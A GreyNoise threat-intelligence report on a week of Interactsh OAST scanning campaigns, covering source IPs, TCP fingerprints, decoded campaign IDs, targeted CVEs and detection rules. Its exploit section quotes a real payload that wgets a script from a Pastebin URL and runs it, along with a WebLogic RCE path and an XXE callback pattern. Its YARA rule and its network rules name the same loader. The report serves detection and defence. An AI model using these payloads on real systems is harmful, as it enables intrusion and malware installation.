GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-01-31

Between January 24-31, 2026, the GreyNoise Global Observation Grid recorded 6,752 sessions from 58 IPs containing 5,531 unique OAST callback domains across 48 campaigns. Activity targeted enterprise applications, IoT devices, and cloud infrastructure.
Tags: OAST, MCP, projectdiscovery, interactsh, rce, iocs, detection engineering, cybersecurity

Author: 🔮Orbie✨

Published: January 31, 2026

Overview

Between January 24 and January 31, 2026, the GreyNoise Global Observation Grid cataloged 6,752 scanning sessions from 58 unique IP addresses embedding 5,531 distinct Out-of-band Application Security Testing (OAST) callback domains across 48 identified campaigns. The activity represents coordinated vulnerability reconnaissance targeting enterprise applications, IoT devices, and cloud infrastructure.

Key Indicators:

  • 5,531 OAST domains decoded from 28 unique machine identifiers
  • Anomalous TCP fingerprints (MSS 65495) observed in 11.8% of traffic
  • Multiple high-severity CVE exploits including WebLogic RCE, Java deserialization, and React prototype pollution
  • Sustained campaign activity spanning 3.6 weeks (earliest OAST timestamp: 2026-01-05)

Infrastructure Analysis

Network Distribution

| ASN | Organization | Countries | Session Count | % of Total |
|---|---|---|---|---|
| AS14956 | RouterHosting LLC | Germany | 2,344 | 34.7% |
| AS24806 | INTERNET CZ, a.s. | Czech Republic | 1,824 | 27.0% |
| AS31898 | Oracle Corporation | Canada, South Korea | 1,400 | 20.7% |
| AS14061 | DigitalOcean | Singapore | 326 | 4.8% |
| AS210538 | KEYUBU Internet | Turkey | 656 | 9.7% |
| Other | Various | 22 countries | 202 | 3.0% |

JA4 Fingerprint Analysis

Three primary fingerprint families identified:

1. Standard Linux Scanner (79.5% of traffic)

JA4T: 64240_2-4-8-1-3_1460_7
  • Window Size: 64240
  • MSS: 1460 (standard)
  • Sessions: 5,372
  • Assessment: Consistent with modified Linux scanning tools or frameworks

2. Anomalous Scanner Type A (8.2% of traffic)

JA4T: 33280_2-4-8-1-3_65495_7
  • Window Size: 33280
  • MSS: 65495 (ANOMALOUS)
  • Sessions: 556
  • Assessment: Custom network stack - MSS value 65495 not found in legitimate software

3. Anomalous Scanner Type B (3.6% of traffic)

JA4T: 65495_2-4-8-1-3_65495_7
  • Window Size: 65495
  • MSS: 65495 (ANOMALOUS)
  • Sessions: 245
  • Assessment: Highly distinctive custom stack configuration

Significance: MSS value 65495 is a strong fingerprint for purpose-built scanning infrastructure. This value approaches the theoretical TCP MSS maximum (65535) and is never used by standard operating systems or network stacks.
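To reproduce fingerprint strings like the three above from captured SYN segments and flag the MSS 65495 value, here is an added example (not GreyNoise's or the JA4 project's code); it assumes only the field layout visible in the strings above (window size, option kinds joined by "-", MSS, window-scale shift) and builds constructed SYN headers as its input.

```python
"""JA4T-style TCP SYN fingerprint from raw header bytes, flagging the MSS value
the report ties to custom scanner stacks. Added example, not GreyNoise/FoxIO
code; assumes the layout of the report's strings: window_kinds_mss_wscale."""
import struct

ANOMALOUS_MSS = 65495  # 65535 - 40: near the 16-bit ceiling, per the report

def tcp_options(hdr: bytes):
    """Yield (kind, data) for each option after the 20-byte fixed header."""
    opts, i = hdr[20:(hdr[12] >> 4) * 4], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                      # End of option list
            return
        if kind == 1:                      # NOP carries no length byte
            yield 1, b""
            i += 1
            continue
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("malformed TCP option")
        yield kind, opts[i + 2:i + length]
        i += length

def ja4t(hdr: bytes) -> str:
    """Build window_kinds_mss_wscale from a SYN segment's header bytes."""
    window = struct.unpack("!H", hdr[14:16])[0]
    kinds, mss, wscale = [], 0, 0
    for kind, data in tcp_options(hdr):
        kinds.append(str(kind))
        if kind == 2 and len(data) == 2:    # MSS option
            mss = struct.unpack("!H", data)[0]
        elif kind == 3 and len(data) == 1:  # window scale option
            wscale = data[0]
    return f"{window}_{'-'.join(kinds)}_{mss}_{wscale}"

def is_anomalous(fingerprint: str) -> bool:
    """True when the MSS field equals the scanner value from the report."""
    return int(fingerprint.split("_")[2]) == ANOMALOUS_MSS

def make_syn(window: int, mss: int, wscale: int = 7) -> bytes:
    """Constructed SYN with Linux-style option order 2-4-8-1-3 (sample input)."""
    opts = (bytes([2, 4]) + struct.pack("!H", mss) + bytes([4, 2])
            + bytes([8, 10]) + bytes(8) + bytes([1]) + bytes([3, 3, wscale]))
    offset_byte = ((20 + len(opts)) // 4) << 4
    fixed = struct.pack("!HHIIBBHHH", 40000, 80, 0, 0, offset_byte, 0x02, window, 0, 0)
    return fixed + opts
```

Calling ja4t(make_syn(33280, 65495)) yields 33280_2-4-8-1-3_65495_7, the Type A string above, and is_anomalous flags it.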

Top Source IPs

| IP Address | Country | ASN | Sessions | First Seen | Last Seen |
|---|---|---|---|---|---|
| 172.86.66.237 | Germany | AS14956 | 2,344 | 2026-01-27 | 2026-01-31 |
| 194.182.90.104 | Czech Republic | AS24806 | 1,824 | 2026-01-25 | 2026-01-31 |
| 40.233.66.153 | Canada | AS31898 | 789 | 2026-01-27 | 2026-01-29 |
| 168.107.59.85 | South Korea | AS31898 | 611 | 2026-01-24 | 2026-01-30 |
| 31.57.77.235 | Turkey | AS210538 | 575 | 2026-01-28 | 2026-01-30 |

OAST Campaign Analysis

Decoded 5,531 OAST domains revealing 48 distinct campaigns across 28 unique machine IDs.

Top 5 Campaigns by Volume

Campaign: dftn9

  • OAST Domains: 2,044 (36.9%)
  • Machine ID: af:ed:d2
  • PIDs: 45287, 6518
  • Duration: January 27-29, 2026 (1.7 days)
  • K-Sort Values: d5sf0j, d5tidb
  • Assessment: Largest campaign by domain count - intensive burst scanning

Campaign: vn6u3

  • OAST Domains: 892 (16.1%)
  • Machine ID: f7:37:86
  • PIDs: 54381, 42767, 35027, 42599
  • Duration: January 27-30, 2026 (3.3 days)
  • K-Sort Values: d5seuo, d5t1qc, d5ug5j, d5ul4a
  • Assessment: Sustained scanning with multiple process restarts

Campaign: gffll

  • OAST Domains: 465 (8.4%)
  • Machine ID: 0f:7d:6a
  • PIDs: 34674, 57772
  • Duration: January 27-29, 2026 (1.5 days)
  • Assessment: Coordinated with dftn9 campaign - similar temporal window

Campaign: 49ndh

  • OAST Domains: 293 (5.3%)
  • Machine ID: 89:bb:62
  • PIDs: 53182, 55486
  • Duration: January 25-30, 2026 (5.0 days)
  • Assessment: Longest-running campaign with steady activity

Campaign: s9ndh

  • OAST Domains: 8 (0.1%)
  • Machine ID: 89:bb:62
  • First Seen: January 24, 2026
  • Assessment: Early reconnaissance phase from same machine as 49ndh campaign

OAST Infrastructure: Domains primarily sat under .oast.fun, .oast.live, .oast.me, .oast.pro, and .oast.site, all parent domains associated with the Interactsh OAST service.
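One way to perform the decoding the campaign analysis above relies on (k-sort value, timestamp, machine ID, PID) for a single callback domain, as an added example that is not GreyNoise's own tooling; it assumes the 20-character Interactsh correlation ID is an rs/xid value, which the field layout reported above matches, and it runs on a constructed sample domain rather than an observed one.

```python
"""Decode the 20-char Interactsh correlation ID that starts a callback hostname.
Added example, not GreyNoise tooling. Assumption: the ID is an rs/xid value
(4-byte Unix time, 3-byte machine ID, 2-byte PID, 3-byte counter) in xid's
base32 "0-9a-v" alphabet, so its first six chars sort by time (k-sort)."""
from datetime import datetime, timezone

XID_ALPHABET = "0123456789abcdefghijklmnopqrstuv"
CORRELATION_LEN = 20
OAST_SUFFIXES = (".oast.fun", ".oast.live", ".oast.me", ".oast.pro", ".oast.site")

def xid_decode(s: str) -> bytes:
    """20 chars x 5 bits = 100 bits; drop the 4 padding bits for 12 raw bytes."""
    if len(s) != CORRELATION_LEN:
        raise ValueError("xid must be 20 characters")
    bits = 0
    for ch in s:
        bits = (bits << 5) | XID_ALPHABET.index(ch)  # ValueError on bad char
    return (bits >> 4).to_bytes(12, "big")

def xid_encode(raw: bytes) -> str:
    """Inverse of xid_decode; used only to build the constructed sample below."""
    bits = int.from_bytes(raw, "big") << 4
    return "".join(XID_ALPHABET[(bits >> (5 * i)) & 0x1F] for i in range(19, -1, -1))

def decode_oast_domain(domain: str) -> dict:
    """Extract the campaign-tracking fields from one Interactsh callback domain."""
    host = domain.lower().rstrip(".")
    if not host.endswith(OAST_SUFFIXES):
        raise ValueError(f"not an Interactsh domain: {domain}")
    label = host.split(".")[0]
    raw = xid_decode(label[:CORRELATION_LEN])
    ts = int.from_bytes(raw[0:4], "big")
    return {
        "ksort": label[:6],
        "timestamp": datetime.fromtimestamp(ts, timezone.utc).isoformat(),
        "machine_id": ":".join(f"{b:02x}" for b in raw[4:7]),
        "pid": int.from_bytes(raw[7:9], "big"),
        "counter": int.from_bytes(raw[9:12], "big"),
        "nonce": label[CORRELATION_LEN:],
    }

# Constructed sample, not an observed domain: dftn9's machine ID and PID from
# the report, time 2026-01-27 17:05:16 UTC, counter 1, made-up 13-char nonce.
SAMPLE_DOMAIN = (xid_encode(bytes.fromhex("6978f04c" "afedd2" "b0e7" "000001"))
                 + "abcdefghijklm.oast.fun")

if __name__ == "__main__":
    print(decode_oast_domain(SAMPLE_DOMAIN))
```

The constructed sample decodes to k-sort value d5sf0j and machine ID af:ed:d2, the dftn9 values listed above.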

Exploit Analysis

CVEs Actively Exploited

CVE-2020-14882 / CVE-2020-14883 (Oracle WebLogic RCE)

  • Occurrences: 23+ payloads
  • Path: /_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession
  • Payload Type: Java deserialization leading to RCE
  • Severity: Critical (CVSS 9.8)

React Prototype Pollution with Malware Loader

  • Occurrences: 17+ variants
  • Malware Staging: https://pastebin.com/raw/9GEqrAq5
  • Execution Methods: setsid, nohup, dos2unix - designed for persistence
  • Payload Pattern:
process.mainModule.require('child_process').execSync(
  'cd /tmp;wget -O run.sh https://pastebin.com/raw/9GEqrAq5;
   chmod +x run.sh;setsid sh run.sh < /dev/null > /dev/null 2>&1 &'
)

Java Deserialization Attacks

  • Frameworks Targeted:
    • Apache Commons (PriorityQueue deserialization)
    • JNDI injection via JdbcRowSetImpl
    • Apache Spark RCE (CVE-2018-11770)
  • Occurrences: Multiple variants across 6+ payload families

XML External Entity (XXE) Injection

  • Occurrences: 8+ payloads
  • Technique: <!ENTITY % xxe SYSTEM "http://[oast-domain]">
  • Target: XML parsers in enterprise applications

IoT/Network Device Command Injection

  • Targets: TP-Link, D-Link, GPON ONT devices
  • Commands: wget, curl, nslookup with OAST callbacks
  • Assessment: Opportunistic targeting of known IoT vulnerabilities

Targeted Applications/Services

  • Oracle WebLogic Server
  • WordPress (multiple plugins)
  • Grafana
  • pfBlockerNg
  • Apache Spark
  • Seeyon OA
  • Various GPON/ONT firmware
  • ColdFusion (Adobe)

Temporal Analysis

Session Volume by Day

| Date | Sessions | Unique IPs | Peak Hour | Burst Detected |
|---|---|---|---|---|
| 2026-01-24 | 73 | 8 | 12:00 UTC | No |
| 2026-01-25 | 361 | 9 | 19:00 UTC | Yes (282 sessions) |
| 2026-01-26 | 459 | 18 | 04:00 UTC | Yes (273 sessions) |
| 2026-01-27 | 1,629 | 19 | 17:00 UTC | Yes (492 sessions) |
| 2026-01-28 | 1,240 | 11 | 05:00 UTC | Yes (372 sessions) |
| 2026-01-29 | 840 | 7 | 13:00 UTC | Yes (210 sessions) |
| 2026-01-30 | 1,552 | 21 | 19:00 UTC | Yes (406 sessions) |
| 2026-01-31 | 598 | 5 | 00:00 UTC | Yes (377 sessions) |

Burst Pattern Analysis

39 hourly bursts detected (>100% increase over previous hour):

  • Peak burst: 2026-01-30 19:00 UTC - 406 sessions (from 2 previous hour)
  • Consistent evening UTC bursts (17:00-21:00)
  • Suggests automated scanning orchestration with scheduled execution

Historical Context & Campaign Lifecycle

Pre-Dating Evidence

OAST timestamp analysis reveals activity pre-dating sensor observation window:

  • Earliest OAST domain: January 5, 2026 (Campaign: 972vm)
  • Earliest sensor session: January 24, 2026
  • Gap: 19 days of prior activity

Assessment: The scanning infrastructure was operational for nearly 3 weeks before hitting GreyNoise sensors. This suggests:

  1. Established infrastructure - not a new/test campaign
  2. Broader target scope - GreyNoise sensors represent subset of total targets
  3. Ongoing operations - campaigns likely continuing beyond observation window

Campaign Coordination Indicators

Evidence of coordinated operations:

  1. Shared OAST infrastructure - all campaigns use the same Interactsh service
  2. Overlapping temporal windows - major campaigns (dftn9, vn6u3, gffll) active Jan 27-29
  3. Common exploit payloads - same CVEs targeted across multiple source IPs
  4. Fingerprint diversity - deliberate use of multiple TCP stack configurations

Attribution & Threat Actor Assessment

Confidence: Medium

Indicators:

  • Professional OAST usage - 48 campaigns with unique machine IDs suggests organized tooling
  • Exploit diversity - targets enterprise (WebLogic, Spark) and IoT infrastructure
  • Custom fingerprints - MSS 65495 indicates purpose-built scanning tools
  • No attribution artifacts - no clear C2 domains, staging servers use Pastebin

Likely Actor Profile

Opportunistic vulnerability research collective or bug bounty operation:

  • Not APT/nation-state - too noisy, lacks operational security
  • Possibly legitimate - OAST usage consistent with security research
  • Commercial tooling - fingerprint diversity suggests framework usage (Nuclei, custom scanners)

Alternative assessment: Reconnaissance for follow-on exploitation by multiple threat actors sharing infrastructure.

Recommendations

Immediate Actions

  1. Block source IPs - All 58 IPs confirmed as scanning infrastructure
  2. Monitor OAST callbacks - Alert on connections to .oast.* domains
  3. Patch CVEs - Prioritize:
    • CVE-2020-14882/14883 (WebLogic)
    • Java deserialization vectors
    • IoT device firmware updates

Detection Engineering

Network Signatures:

# Anomalous MSS detection
alert tcp any any -> any any (msg:"Anomalous MSS 65495 - Custom Scanner"; \
  tcp.mss: 65495; sid:1000001;)

# OAST domain pattern
alert dns any any -> any 53 (msg:"Interactsh OAST Callback"; \
  dns.query; content:".oast."; sid:1000002;)

YARA for malware staging URL:

rule Pastebin_9GEqrAq5_Malware_Loader {
  strings:
    $url = "pastebin.com/raw/9GEqrAq5"
    $wget = "wget -O run.sh"
  condition:
    any of them
}

Long-term Monitoring

  1. Track machine ID evolution - Monitor for reuse of MAC prefixes (af:ed:d2, f7:37:86, 0f:7d:6a, 89:bb:62)
  2. JA4 fingerprint database - Add MSS 65495 patterns to threat intel feeds
  3. OAST domain correlation - Cross-reference k-sort values across future incidents

Conclusion

This analysis documents a multi-week reconnaissance campaign leveraging sophisticated OAST techniques across 48 distinct sub-campaigns. While the activity is noisy and detectable, the scale (5,531 callback domains), infrastructure diversity (28 machines), and exploit breadth indicate an organized operation.

The use of anomalous TCP fingerprints (MSS 65495) provides a high-confidence detection opportunity for defensive teams. Organizations should prioritize patching the identified CVEs and implementing OAST callback monitoring.